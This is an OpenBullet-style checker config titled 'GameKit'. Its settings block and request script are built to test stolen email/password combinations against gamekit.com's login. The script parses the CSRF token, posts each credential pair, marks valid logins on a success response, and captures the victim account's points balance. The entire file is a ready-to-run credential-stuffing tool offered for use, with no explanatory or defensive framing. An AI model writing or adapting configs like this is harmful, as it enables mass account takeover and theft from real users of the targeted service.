[SETTINGS]
{
  "Name": "GameKit",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-07-11T21:05:48.801884+01:00",
  "AdditionalInfo": "",
  "Author": "TheBusinessMan#2696",
  "Version": "1.1.2",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://gamekit.com/login/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "name=\"_token\" value=\"" "\"" -> VAR "token" 

REQUEST POST "https://gamekit.com/user/login/" 
  CONTENT "email=<USER>&password=<PASS>&remember_me=1&_target_path=https%3A%2F%2Fgamekit.com%2F&_token=<token>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "{\"success\":true,\"" 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" EqualTo "401" 

REQUEST GET "https://gamekit.com/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "GAMEKIT.DataLayer.user.pkt = " ";" -> CAP "Points" 

